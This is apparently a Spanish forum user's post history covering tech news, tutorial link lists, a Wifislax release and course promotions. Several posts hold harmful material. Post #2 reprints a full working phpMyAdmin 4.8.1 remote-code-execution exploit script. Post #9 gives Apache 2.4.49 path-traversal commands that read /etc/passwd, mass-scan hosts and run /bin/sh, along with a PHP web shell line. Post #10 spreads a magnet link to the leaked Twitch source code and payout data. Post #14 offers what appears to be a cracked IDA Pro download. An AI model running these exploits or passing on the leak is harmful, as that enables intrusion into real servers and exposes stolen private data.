Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - el-brujo

#1
Tutoriales y Manuales



Tutoriales Análisis Malware

Tutoriales reversing


Tutoriales herramientas Hacking



Tutoriales Hacking Wireless



Tutoriales Herramientas Windows



Tutoriales Windows 11


Tutoriales administradores Windows



Tutoriales recuperación 
 
 
Tutoriales Seguridad y Redes




Tutoriales NAS


Tutoriales Multimedia


Tutoriales HoneyPot

Tutoriales Copias de Seguridad


Tutoriales Privacidad y Cifrado


Tutoriales Básicos de seguridad


Tutoriales para evitar ataques de ransomware


Tutoriales SyAdmin - Redes


Tutoriales Virtualización



Tutoriales sysadmins webmasters




Tutoriales de redes



Tutoriales Docker



Tutoriales y Manuales Linux


Tutoriales Hardware


Monitores - Gráficas

Discos Duros y Unidades SSD



Tutoriales RaspBerry Pi


Tutoriales Android


Descargas
#2
Código (php) [Seleccionar]
# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
# Date: 17/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: ChaMd5 & Henry Huang
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.1
# Tested on: Linux - Debian Buster (PHP 7.3)
# CVE : CVE-2018-12613

#!/usr/bin/env python

import re, requests, sys

# check python major version
if sys.version_info.major == 3:
  import html
else:
  from six.moves.html_parser import HTMLParser
  html = HTMLParser()

if len(sys.argv) < 7:
  usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
  print(usage.format(sys.argv[0],sys.argv[0]))
  exit()

def get_token(content):
  s = re.search('token"\s*value="(.*?)"', content)
  token = html.unescape(s.group(1))
  return token

ipaddr = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
command = sys.argv[6]

url = "http://{}:{}{}".format(ipaddr,port,path)

# 1st req: check login page and version
url1 = url + "/index.php"
r = requests.get(url1)
content = r.content.decode('utf-8')
if r.status_code != 200:
  print("Unable to find the version")
  exit()

s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
version = s.group(1)
if version != "4.8.0" and version != "4.8.1":
  print("The target is not exploitable".format(version))
  exit()

# get 1st token and cookie
cookies = r.cookies
token = get_token(content)

# 2nd req: login
p = {'token': token, 'pma_username': username, 'pma_password': password}
r = requests.post(url1, cookies = cookies, data = p)
content = r.content.decode('utf-8')
s = re.search('logged_in:(\w+),', content)
logged_in = s.group(1)
if logged_in == "false":
  print("Authentication failed")
  exit()

# get 2nd token and cookie
cookies = r.cookies
token = get_token(content)

# 3rd req: execute query
url2 = url + "/import.php"
# payload
payload = '''select '<?php system("{}"?>';'''.format(command)
p = {'table':'', 'token': token, 'sql_query': payload }
r = requests.post(url2, cookies = cookies, data = p)
if r.status_code != 200:
  print("Query failed")
  exit()

# 4th req: execute payload
session_id = cookies.get_dict()['phpMyAdmin']
url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
r = requests.get(url3, cookies = cookies)
if r.status_code != 200:
  print("Exploit failed")
  exit()

# get result
content = r.content.decode('utf-8', errors="replace")
s = re.search("select '(.*?)\n'", content, re.DOTALL)
if s != None:
  print(s.group(1))
           
#3


Wifislax 64 bits con kernel 5.15.10

Disponible nueva versión distro hacking Wireless
🔃Wifislax 64 con kernel 5.15.10

Módulos:
ℹ️Firefox 95
ℹ️Tor 11
ℹ️Websploit 4.0
ℹ️Kodi
ℹ️Wine
ℹ️Burp Suite
ℹ️LibreOffice

📁Descargar ISO = 2,28 GB
https://ns2.elhacker.net/isos/wifislax64-21122021.iso

📁Descargar ISO + Módulos = 5GB
https://ns2.elhacker.net/isos/WIFISLAX-CURRENT-PLASMA.zip

Descargar ISO 2,2GB
https://ns2.elhacker.net/isos/wifislax64-21122021.iso


Descargar ISO + Módulos 5GB
https://ns2.elhacker.net/isos/WIFISLAX-CURRENT-PLASMA.zip

Módulos:

CitarHandBrake-1.4.2-x86_64-3wifislax.xzm  
Multilib-current-20-12-2021.xzm        
aegisub-kit-3.2.2-8wifislax.xzm        
ardour-kit-6.9-4wifislax.xzm  
audacity-3.0.2-x86_64-3wifislax.xzm    
avidemux-2.7.8-x86_64-10wifislax.xzm  
burpsuite-2021.12-noarch-1wifislax.xzm
ciano-kit-0.2.4-2wifislax.xzm
exaile-kit-4.1.1-10wifislax.xzm        
filezilla-kit-3.57.0-1wifislax.xzm    
firefox-95.0-x86_64-1wifislax.xzm      
four-in-a-row-kit-3.38.1-4wifislax.xzm
frostwire-6.9.5-noarch-1wifislax.xzm  
inkscape-kit-1.1.1-1wifislax.xzm      
jdownloader2-2.0-noarch-3wifislax.xzm  
kde-games-5.89.0-x86_64-1wifislax.xzm  
kodi-kit-19.2-3wifislax.xzm  
libreoffice-kit-7.2.4-x86_64-1wifislax.xzm
lives-kit-3.2.0-4wifislax.xzm
metasploit-kit-6.1.20-1wifislax.xzm    
mkvtoolnix-kit-60.0.0-1wifislax.xzm    
nvidia-current-470.63.01-20wifislax.xzm
pangzero-kit-1.4.1+git20121103-1wifislax.xzm      
pcsx2-kit-1.7.2040-2wifislax.xzm      
qbittorrent-kit-4.3.1-5wifislax.xzm    
shortwave-kit-1.1.1-2wifislax.xzm      
social-engineer-toolkit-8.0.3_80fe70d-x86_64-2wifislax.xzm
steam-1.0.0.74-x86_64-1wifislax.xzm    
teamviewer-15.24.5-x86_64-1wifislax.xzm
tor-browser-11.0a10-x86_64-1wifislax.xzm  
vlc-kit-3.0.16-14wifislax.xzm
vokoscreenNG-3.0.9-x86_64-2wifislax.xzm
websploit-4.0.4-x86_64-4wifislax.xzm
wine-kit-6.21-1wifislax.xzm  
worldofgoo-1.41-x86_64-2wifislax.xzm  
youtube-dl-kit-2021.06.06-3wifislax.xzm  
#4
Seguridad / Descuento cursos Securizame
24 Noviembre 2021, 00:13 AM


Descuento será aplicable desde el Viernes 26 de Noviembre hasta
el Lunes 29 de Noviembre.

Este año regalaremos el acceso a uno de sus cursos online++

LLEGA EL BLACK FRIDAY 2021 Y SECURÍZAME OFRECE UN 25% DE DESCUENTO EN TODOS SUS CURSOS ONLINE, ONLINE++ Y PACKS ESPECIALIZADOS EN CIBERSEGURIDAD OFENSIVA Y DEFENSIVA

Securízame, una de las empresas españolas más reconocidas a nivel nacional e internacional en materia de ciberseguridad, de la mano de su CEO, Lorenzo Martínez Rodríguez, su gran plantilla de profesores y colaboradores, y la gran calidad de sus cursos, lleva casi 10 años ocupándose de la formación de profesionales, quienes encuentran en ella los medios y las oportunidades ideales
para complementar, mejorar y ampliar sus conocimientos.

A la hora de comprar el acceso a cualquiera de los cursos online desde la página de Securízame [http://cursos.securizame.com/?cursos-tag=Online%20] se verá el precio normal del curso. Una vez se lleva a cabo el registro en el mismo, se aplicará automáticamente el 25% de descuento en el precio, por lo que lo único que hay que hacer al momento del registro, es especificar en el campo de comentarios, para cuándo se quiere iniciar el curso.

Para completar el fin de semana de Black Friday, Securízame ha decidido regalar el acceso a uno de sus cursos online++: "Aplicación del modelo Zero Trust en AWS"

[https://www.securizame.com/nuevo-curso-online-aplicacion-del-modelo-zero-trust-
a-la-seguridad-corporativa-en-aws) a un agraciado entre todos aquellos que participen en la dinámica que han preparado por Twitter, además de que al comprar cualquiera de sus cursos, se obtiene una participación extra. Se podrá tener más información sobre cómo ganar este obsequio en el blog de su página web [https://www.securizame.com/news] y en sus redes sociales.

Citar
Estos descuentos Black Friday sólo son válidos a partir del Viernes 26 de noviembre de 2021 a las 00:00 hasta el Lunes 29 de noviembre de 2021 a las 23:59 en horario peninsular de España.
#5
Seguridad / Relay de elhacker.net en TOR
24 Noviembre 2021, 00:07 AM
Para ayudar usuarios censurados puedan internet libre y sin censura en países como China y demás, uno de los servidores de descargas de elhacker.net (ns2.elhacker.net) es un nuevo relé de la red TOR:

De momento sin mucho tráfico, aunque va aumentando paulatinamente:
https://metrics.torproject.org/rs.html#details/F52611DA7E1EE1434C8B45368D0872C437A02958

El servidor tiene una conexión internet simétrica de 1Gbps con Adamo en Barcelona







Citar
Tor's uptime is 4 days 8:00 hours
I've sent 391.57 GB and received 386.46 GB.


He visto  algun nodo de tor que hace 5TB al día o más, una barbaridad. La suerte que es apenas consume CPU, ni disco duro, sólo tráfico de entrada y de salida (a partes iguales, aproximadamente).

No es un nodo de salida (Exit relaya), es un nodo intermedio y esperamos que sea un nodo guardián (de entrada) más adelante.

Quizás también pongamos el foro o la web en un dominio .onion próximamente.

Más información:
https://blog.torproject.org/run-a-bridge-campaign/

Red TOR: ¿qué es, cómo funciona y cómo se usa?
https://blog.elhacker.net/2021/11/red-tor-que-es-como-funciona-y-como-se-usa-relay-diferencias-nodos-cebolla.html

También un nuevo mirror de la distribución Tails (todo pasa por TOR) en:

https://tails.elhacker.net
#6
Elon Musk estaba dispuesto a donar 6.000 millones de dólares para acabar con el hambre en el mundo a la ONU si le garantizan que eso lo solucionaría, pero es ciertamente complicado

- Elon Musk retó a la ONU a que le mostrara cómo 6.000 millones de dólares (5.250 millones de euros) podrían combatir el hambre en el mundo.
- La ONU se ha dirigido a la persona más rica del mundo con una propuesta.
-Musk había declarado que "vendería las acciones de Tesla y lo haría" si la ONU pudiera mostrar cómo se gastaría ese dinero.

¿Alguien sabe cómo ha acabado el tema finalmente?

Fuentes:

ONU a Elon Musk: este es el plan de US$ 6.000 millones para acabar con la hambruna mundial
https://cnnespanol.cnn.com/2021/11/18/onu-elon-musk-plan-hambruna-mundial-trax/


La ONU responde al reto de Elon Musk: este es su plan de 6.600 millones de dólares para atajar el hambre en el mundo
https://www.businessinsider.es/plan-hambre-mundo-onu-respuesta-elon-musk-965453
#7
Bonita reflexión:

Citar
Las tarjetas de Mid-Entry level han desaparecido, no hay nada entre los 100€ y los 250€, absolutamente nada. Pero ya no solo las gráficas, AMD sin anunciar Ryzen 3, Intel sin mencionar i3 (por ahora), las rams DDR5 que cuestan más que un PC entero hace 5 años...

Estoy hartisimo de la situación y más de los que encima la justifican, si una gráfica de la serie xx60 €antes tenía "X" capacidades y nuevas funcionalidades costando 200€ y ahora una de la serie xx60 cuesta 499€ aunque tenga tres mil capacidades más, entonces NO estamos avanzando, no estás ganando nada, lo estás pagando.
#8
Herramienta Rufus facilita actualizar o instalar Windows 11 en PCs no soportados:

Instalación Extendida de Windows 11

- Deshabilita automáticamente los requisitos de 8GB de RAM, TPM y Secure Boot



Sólo disponible versión Beta:
https://github.com/pbatard/rufus/releases

CitarAdd Windows 11 "Extended" installation support (Disables TPM/Secure Boot/RAM requirements)

https://rufus.ie/es/

Descargar ISO Oficial Microsoft Windows 11
https://www.microsoft.com/es-es/software-download/windows11

#9
CVE-2021-41773 POC

La vulnerabilidad sólo funciona con Apache HTTP 2.4.49

Y según Shodan: hay 112,755  Apache Server 2.4.49

Citar127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd


Citarcat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Citarcurl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux

<?php echo system($_GET['c']); ?>


Local file disclosure

Citar$ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"


Remote Code Execution

Citar$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

Bug
https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
#10
Citar> Entirety of twitch.tv, with commit history going back to its early beginnings
> Mobile, desktop and video game console Twitch clients
> Various proprietary SDKs and internal AWS services used by Twitch
> Every other property that Twitch owns including IGDB and CurseForge
> An unreleased Steam competitor from Amazon Game Studios
> Twitch SOC internal red teaming tools (lol)

AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making!

twitch leaks part one Anonymous

Torrent (128GB): magnet:?xt=urn:btih:N5BLZ6XECNEHHARHJOVQAS4W7TWRXCSI&dn=twitch-leaks-part-one&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce
Repository listing: https://dpaste.org/MvoM



Jeff Bezos paid $970 million for this, we're giving it away FOR FREE.


-  Torrent con 125GB datos filtrados

La carpeta twitch-payouts es muy interesante

Filtradas también las ganancias dinero de Españoles

¿Cuánto dinero ganan Ibai y AuronPlay al mes en Twitch?






Fuente:
https://boards.4channel.org/g/thread/83691438#p83691438

mensaje original

CitarWe bring to you today an extremely poggers leak:

Twitch is an American video live streaming service that focuses on video game live streaming, including broadcasts of esports competitions, operated by Twitch Interactive, a subsidiary of Amazon.com, Inc.

Their community is also a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories, including:

> Entirety of twitch.tv, with commit history going back to its early beginnings
> Mobile, desktop and video game console Twitch clients
> Various proprietary SDKs and internal AWS services used by Twitch
> Every other property that Twitch owns including IGDB and CurseForge
> An unreleased Steam competitor from Amazon Game Studios
> Twitch SOC internal red teaming tools (lol)

AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making!

Torrent (128GB): magnet:?xt=urn:btih:N5BLZ6XECNEHHARHJOVQAS4W7TWRXCSI&dn=twitch-leaks-part-one&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce
Repository listing: https://dpaste.org/MvoM

Jeff Bezos paid $970 million for this, we're giving it away FOR FREE.

#DoBetterTwitch
#11
 5 funcionalidades principales dentro del ciclo de vida de la gestión de riesgos de ciberseguridad de una organización:

-    Identificar: especialistas en Governance Risk and Compliance (GRC) se encargan de la identificación y prevención de amenazas, proporcionando información para decidir de la mejor manera dónde y cómo destinar recursos para mejorar la seguridad, mitigando los riesgos allí donde existan y sean más elevados, tanto a nivel técnico como organizativo.
-     Proteger: arquitectos y administradores de seguridad, ingenieros y técnicos de sistemas y de redes y especialistas en devops que son los encargados de diseñar, operar y mantener actualizados las diferentes plataformas de seguridad. Con tanta diversidad de productos y fabricantes a menudo requieren formaciones específicas.
-    Detectar: analistas del SOC, analistas de ciberinteligencia (estos más trasversales), threat hunters, analistas de malware, especialistas en SIEM, hackers éticos (aquí incluyo pentesters y red/purple teamers) y otros encargados de analizar y detectar los fallos y las vulnerabilidades de los sistemas de la empresa. Requieren la adopción de soluciones de monitorización continua que detecten actividad anómala y otras amenazas a la continuidad operativa. La parte ofensiva se encarga de simular adversarios de cara a poner a prueba y mejorar estos sistemas de detección.
-    Responder: especialistas en respuesta ante incidentes y analistas forenses. Encargados de recopilar y analizar información sobre el incidente, realizar todas las actividades necesarias para contenerlo y erradicarlo e incorporar las lecciones aprendidas en las estrategias de respuesta revisadas.
-    Recuperar: profesionales enfocados a desarrollar e implementar actividades efectivas para restaurar las capacidades o los servicios que se vieron afectados debido a un incidente. Las organizaciones deben contar con un plan de recuperación, poder coordinar las actividades de restauración con partes externas e incorporar las lecciones aprendidas en su estrategia de recuperación actualizada.

Además cuando entréis en una empresa seguro que os hablarán o escucharéis opr los pasillos acerca del CSO, CISO y del DPO. Para que no os pillen fuera de juego os dejo también qué significa y debe hacer cada uno:

   CSO (Chief Security Officer): es el responsable de la seguridad de la empresa y se ocupa de establecer los planes de continuidad de negocio y recuperación de desastres, comprender las necesidades normativas y asegurarse de que todas las actividades son planificadas y ejecutadas para satisfacer los objetivos de la empresa. En empresas pequeñas el CISO y el CSO pueden coincidir.
  CISO (Chief Information Security Officer): es el director de seguridad de la información, cuya función es alinear la seguridad de la información con los objetivos de negocio. Establece las políticas de seguridad de la empresa y las medidas y controles necesarios.
   Delegado de Protección de Datos (DPO): responsable de informar y asesorar a todos los empleados de la organización sobre las obligaciones a que están sujetos por la normativa, además de supervisar su cumplimiento y actuar como punto de contacto con la autoridad competente. Es una figura introducida por el nuevo GDPR. En ciertas categoría de organizaciones, puede coincidir con el Compliance Officer.


¿Qué estudiar para dedicarse a seguridad informática?

Si quieres valorar esta opción te aconsejo que eches un vistazo a los catálogos de formación de seguridad que pone a nuestra disposición el INCIBE (Instituto Nacional de Ciberseguridad):

   El Catálogo de másteres en ciberseguridad en España recopila un total de 76 programas de Máster y 3 Grados.
https://www.incibe.es/sites/default/files/paginas/talento/catalogos-formacion/catalogo-masteres.pdf

   El Catálogo de instituciones que ofrecen formación en ciberseguridad en España reúne 120 centros donde se puede realizar algún estudio en ciberseguridad, en modalidad máster o en otro formato.
https://www.incibe.es/sites/default/files/paginas/talento/catalogos-formacion/catalogo-instituciones.pdf

Certificaciones

certificaciones. Si me preguntaras por el tema de hacking te diría que ahora en España claramente hay una tendencia hacia el OSCP (hace muchos años era el CEH) pero siempre va a depender un poco del puesto concreto que quieras desempeñar.

En cualquier caso, el número de certificaciones se ha disparado también con el paso de los años. Prueba de ello es el espectacular mapa de Paul Jeremy:



Fuente:
https://www.hackplayers.com/2021/10/como-iniciarse-en-ciberseguridad.html
#12
En septiembre abre la matrícula para el módulo 1 del ciclo 2021-2022 de C1b3rWall Academy, un curso online gratuito sobre ciberseguridad que ofrece la Universidad de Salamanca junto a la Policía Nacional de España. Inscripciones en c1b3rwallacademy.usal.es




Esta edición incluirá módulos técnicos junto a otros divulgativos, como por ejemplo los de concienciación y securización, especialmente diseñados para aquellos que no tengan conocimientos en estas áreas y que quieran proteger a sus familias o sus negocios.

Cuenta con un campus virtual en el cual los alumnos podrán acceder a todo el material y realizar las distintas actividades. Con más de 16 módulos confirmados al día de la fecha, ya está disponible el Módulo 0, un curso sobre blockchain y criptomonedas. El Módulo 1 sobre arquitectura y redes, al igual que los otros 15 módulos restantes, todavía no cuentan con fecha de inicio confirmada, pero será cerca de la semana del 20 de septiembre, aseguraron desde la cuenta oficial de Twitter de C1b3rWall.




En 2020 se realizó la primera edición online de C1b3rWallAcademy, un curso gratuito en español dirigido a quienes estén interesados en formarse en ciberseguridad, y fue un éxito. Con más de 41.000 participantes de 82 países, esa edición contó con más de 130 ponentes provenientes de la Policía Nacional de España, universidades, asociaciones y empresas reconocidas en el campo de la seguridad, además de 38 comunidades de hackers de España y otros países.

Los alumnos que completen la formación recibirán un certificado digital de asistencia gratuito de la Universidad de Salamanca y de C1b3rWall Academy. Además, los alumnos que lo deseen podrán recibir un diploma de superación (pago) online e impreso por cada módulo aprobado, cuya duración es de entre 36 y 65 horas. Para ello, será necesario que el alumno haya visualizado al menos el 70% del temario y aprobado los cuestionarios.


Los títulos de cada módulo que conforma el curso:




    Módulo transversal – Transformación digital
    Módulo 0 – Blockchain y criptomonedas
    Módulo 1 – Redes y arquitecturas
    Módulo 2 – Concienciación
    Módulo 3 – Securización de entornos personales y de trabajo
    Módulo 4 – Lenguajes de programación orientados a ciberseguridad
    Módulo 5 – Inteligencia. Fuente para la investigación
    Módulo 6 – Agentes de la amenaza
    Módulo 7 – Gestión de incidentes. Buenas prácticas en cibercrisis: Especial referencia al ransomware
    Módulo 8 – Estafas en la red. Medios de pago
    Módulo 9 – Pentesting
    Módulo 10 – Análisis forense. Malware y técnicas de ocultación
    Módulo 11 – IoT y seguridad
    Módulo 12 – IA y seguridad
    Módulo 13 – SmartCities
    Módulo 14 – Legal Tech
    Módulo 15 – Drones
    Módulo 16 – Ciberseguridad y Data Science



Fuente:

https://www.welivesecurity.com/la-es/2021/09/09/c1b3rwall-academy-2021-completo-curso-online-gratuito-ciberseguridad-espanol/
#14
 IDA Pro 7.6 SP1 + HexRays (x86/x64/ARM/ARM64/MIPS)

IDA Pro 7.6 SP1.7z:
MD5   78f26c725b193803b2e534df499d58c8
SHA-1   d31bc3403776c962833c5f38d6c1dd4591677425
SHA-256   6c3857d81afc904b0ea355e96f6431c2b880e39af19a974389b26c7c4360d125



Descargar
https://bit.ly/2WEvxOY
#15


Valve ha lanzado la que será una de las grandes noticias del año dentro del sector de los videojuegos: Steam Deck. Detrás de este nombre se encuentra un PC portátil con el cual se podrá acceder a la biblioteca de juegos de Steam y sus características. Las reservas se abrirán el 16 de julio y el dispositivo estará disponible en diciembre en tres modelos cuya única diferencia es el almacenamiento (que se puede ampliar mediante microSD): 64 GB (419 euros), 256 GB (549 euros) y 512 GB (679 euros). Estará disponible a partir de diciembre de 2021



[youtube=640,360]https://www.youtube.com/watch?v=CdhyoLvfkOs[/youtube]

Designed by Valve, powered by Steam

Valve acaba de lanzar un nuevo dispositivo propio llamado Steam Deck, que viene a ser su propia visión de una Nintendo Switch. Dentro de ella tenemos un PC que, según la web oficial del producto, es capaz de reproducir juegos AAA con buena calidad.

La Steam Deck ya se puede reservar por:

Citar419€ la versión de 64GB
549€ versión con 256GB
679€ la de 512GB.

Todas incluyen un estuche, pero las más caras usan una memoria de almacenamiento más rápida y la más alta de la gama también cuenta con una pantalla anti rreflectante. Los que se decidan a reservarla la tendrán disponible en diciembre, por lo que puede ser un buen regalo navideño para los jugones.



Estamos hablando de una consola portátil capaz de mover juegos de PC, lo que explicaría que tenga un precio similar al de las consolas como la PlayStation y Xbox.

Steam Deck, la consola portátil con Juegos PC




Steam Deck ha sido diseñada en base a tres pilares: potente, cómodo y versátil. Valve asegura que su portátil ejecuta los últimos juegos AAA y "los ejecuta bien", promete unos controles de gran fidelidad para largas sesiones de juego y la opción de conectar periféricos, pasar la imagen a una pantalla grande y "hacer todas las cosas que se esperan de un PC". Los juegos no serán ningún problema. Bastará con encender el dispositivo, acceder a la cuenta de Steam y estarán disponibles todos los que haya en la biblioteca.



Ya tenemos precio y fecha, así que ahora toca descubrir los detalles de la ficha técnica de Steam Deck. La portátil cuenta con una APU de AMD personalizada con procesador Zen 2 y gráfica RDNA 2 acompañada de 16 GB de RAM. La pantalla LCD de 7 pulgadas es táctil, tiene una resolución de 1280 x 800 píxeles, 700 nits, una frecuencia de actualización de 60 Hz y un sensor de luz ambiental. La batería de 40 Wh se alimenta mediante una entrada USB C de 45 W y promete aguantar entre 2 y 8 horas de juego. Steam Deck pesa 669 gramos.

¿Y qué pasa con la experiencia de juego? Definitivamente, Valve ha hecho las tareas a la hora de diseñar su consola:

Por un lado, a la disposición de botones tradicional hay que sumar la inclusión de dos trackpads cuadrados de 30 mm con retroalimentación háptica. Una herencia directa de los Steam Controllers y que busca ofrecer una alternativa fiable al uso del ratón.


A nivel de controles y entradas, Steam Deck ofrece un completo panel de mandos con los botones ABXY, cruceta, gatillos analógicos L y R, botones frontales L y R, botones de ver y de menú, cuatro botones de empuñadura asignables, dos sticks analógicos de tamaño completo con toque capacitivo y dos trackpads de 32,5 mm con respuesta háptica en HD. En el interior también hay un giroscopio. Respecto a la conectividad, tenemos Bluetooth 5.0 y wifi de doble banda (2.4 GHz y 5 GHz), mientras que el audio es estéreo y hay un jack para auriculares.


La pantalla de siete pulgadas es táctil y con laminación óptica. Y si apostamos por el modelo de 512 GB además el cristal será antirreflectante de primera calidad, según Valve. Lo cual agilizará muchos trámites en diversos juegos.  Incorpora un sistema de giroscopio IMU de 6 ejes y un sistema de vibración háptica en HD. Estrechando más y mejor las comparaciones con la consola de Nintendo y sus Joy Cons, pese a que en este caso no se trata de mini-mandos extraíbles.

Software: SteamOS

Respecto al software, Steam Deck usa SteamOS 3.0 (basado en Arch) y el entorno de escritorio Plasma de KDE. No es un sistema cerrado, al contrario. Steam Deck es un PC portátil y Valve promociona la capacidad que tiene de admitir la instalación de todo tipo de software, incluyendo navegadores web, reproductores de video, otras tiendas, programas de productividad e incluso otros sistemas operativos como Windows, pero hay que tener en cuenta que SteamOS está optimizado para SteamDeck. También se pueden usar todo tipo de periféricos y accesorios

El software se basa en el Sistema Operativo SteamOS 3.0 (basado en Arch), una nueva versión de SteamOS que preservará y trasladará la práctica totalidad de funciones de Steam a la nueva consola, incluyendo:

- El Chat de Steam, el cual será accesible al pulsar un botón. Tan sencillo como suena.
- La Tienda, lógicamente. Lo cual incluye todas las prestaciones adicionales del brutal escaparate de Steam y la tentación de las rebajas y descuentos esporádicos.
Sumando las dos anteriores llega el otro gran activo de Valve: la Comunidad.
- El sistema de Guardado en la nube, perfecto para continuar la partida justo dónde la dejamos en el escritorio.
- La reproducción remota, con la que podremos retransmitir nuestros juegos desde nuestro PC a nuestra consola, incluso si no estamos en casa. Una solución brillante para ahorrar espacio de almacenamiento.
- Y por último, pero no menos importante, el sistema de notificaciones. Perfecto para recibir mensajes o ver si hemos obtenido un logro sin tener que salir del juego, entre otras opciones.
Steam Deck se puede conectar a televisores y monitores mediante una estación de conexión que cuenta con un puerto USB-A 3.1 y dos puertos USB-A 2.0 para periféricos, Ethernet para redes y DisplayPort 1.4 y HDMI 2.0 para conexiones externas. Se desconoce por ahora qué precio tendrá la estación.

Especificaciones y Características Steam Deck



- Procesador Zen 2 + RDNA 2 que ofrece un rendimiento más que suficiente para ejecutar los últimos juegos AAA en una potencia envolvente muy eficiente.
- Cruceta a la izquierda y 4 botones a la derecha.
- Sticks analógicos, 4 gatillos y 4 botones en la empuñadura.
- Dos trackpads
- Pantalla táctil de 7 pulgadas
- Giroscopio
- Sonido de alta fidelidad.
- 7 u 8 horas de autonomía
- Slot para tarjeta SD.
- Posibilidad de conectarla a un monitor externo, ratón y teclado.
- Almacenamientos de 64GB, 256GB y 512GB.
- Movido por una nueva versión de SteamOS basada en Arch Linux y escritorio KDE.


Comparar Steam Deck con Nintendo Switch es algo completamente justificable. Incluso, de PS Vita: estamos hablando de un sistema portátil con pantalla táctil de 7 pulgadas (1280 x 800 píxeles) con disposición simétrica de Sticks. Pero es que, además, gracias a su propia estación de conexión (Dock) podremos conectarla vía HDMI 2.0 a una pantalla.


Eso sí, a diferencia de la consola de Nintendo, el Dock de Steam Deck se venderá por separado, aunque abrirá la puerta a que juguemos desde la propia consola en modo sobremesa.

[youtube=640,360]https://www.youtube.com/watch?v=N1DWsecMiqo[/youtube]

Fuentes:
https://www.elotrolado.net/noticias/consolas/steam-deck-fecha-precio-detalles
https://www.linuxadictos.com/steam-deck-valve-anuncia-una-consola-portatil-para-juegos-de-pc-por-419e.html
#16
Un individuo (por llamarlo de alguna manera) de 19 años que tiene 26 millones de seguidores en TikTok

De hecho es el TikToker español con más seguidores.

CitarEn una entrevista con el youtuber Mostopapi, Naim Darrechi, mallorquín de 19 años y 26.8 millones de seguidores en Tiktok, hizo las declaraciones que se han convertido en la polémica influencer de la semana. Le "cuesta mucho" ponerse el condón para tener relaciones sexuales, así que, como después de tanto tiempo no ha dejado embarazada a ninguna, decidió empezar a "acabar dentro" de ellas por sistema.

Suerte que dice que estéril, así no podrá tener descendencia.

"Hace unos años, su ex pareja, la influencer Gironina Ángela Mármol le acusó de violación y maltrato psicológico."

Fuente:
https://www.niusdiario.es/vida/visto-oido/naim-darrechi-polemica-preservativo-irene-montero-fiscalia_18_3169174067.html

Vídeo
[youtube=640,360]https://www.youtube.com/watch?v=H0QfWF_BwdA[/youtube]

Irene Montero lleva el caso del 'tiktoker' que eyacula dentro sin consentimiento a la Fiscalía

CitarLa ministra Irene Montero ha asegurado que va a poner el caso en conocimiento de Fiscalía el caso del tiktoker que engaña a las mujeres con las que se acuesta y que eyacula en su interior. "Quitarse el preservativo o eyacular dentro sin consentimiento es hoy abuso sexual y la Ley #SoloSíesSí lo reconocerá como agresión. Presumir ante 26mill de seguidores de algo así refleja la urgencia de poner el consentimiento en el centro", ha publicado Montero en Twitter

Citar, al tener casi 25 millones de seguidores en TikTok, Naim Darrechi podría cobrar entre 12.600 y 21.000 euros por post publicado.

CitarEn este mundo no se trata tanto de número de seguidores, sino de lo que transmites y si tu imagen gusta a una marca, se fijara en ti", mencionó su manager en 2019

Fuente:
https://www.elmundo.es/loc/famosos/2021/05/05/608bf152fdddfffc3e8b45f1.html

¿Qué le parecería a la marca Durex como anunciante? sería un buen vendedor de preservativos ¿no?

"Me cuesta mucho con condón. Nunca lo utilizo". ES como si no llevara nada podría decir ahora  :laugh:


Lo repito una vez más para los padres que tienen jóvenes adolescentes, mucho cuidado con TikTok

TikTok no es para niños

CitarLa Policía Nacional española advierte de que los pedófilos buscan a menores de edad en TikTok. Los depredadores sexuales encuentran en la aplicación "una forma rápida de contactar con niños", según los agentes de la Unidad Central de Ciberdelincuencia.
#18
⏩ Noctua presenta enorme disipador pasivo 🔄 CPU fanless NH-P1 por 110$
https://noctua.at/en/nh-p1

- 6 heatpipes ♨️ y 1.180g peso🆒

- Se pueden añadir 1-2 ventilador/es

- Capaz refrigerar Intel Core i9-11900K a 3,6 GHz con el test Prime95 (125W🔥)



Citar«El NH-P1 es nuestro primer disipador pasivo, y debería ser fácil ver que no solo hemos cogido un disipador normal y le hemos quitado el ventilador».- dice Roland Mossig, CEO de la compañía,- «Se ha dedicado muchísimo trabajo de ingeniería en el diseño de este disipador para que funcione sin ventilador desde cero y estamos realmente orgullosos del resultado final. En nuestro sistema de demostración completamente sin ventiladores, el Noctua NH-P1 enfría un Intel Core i9-11900K con Prime95 a más de 3,6 GHz, ¡esto significa que puede con 125W de calor sin ventiladores y sin hacer ruido!».




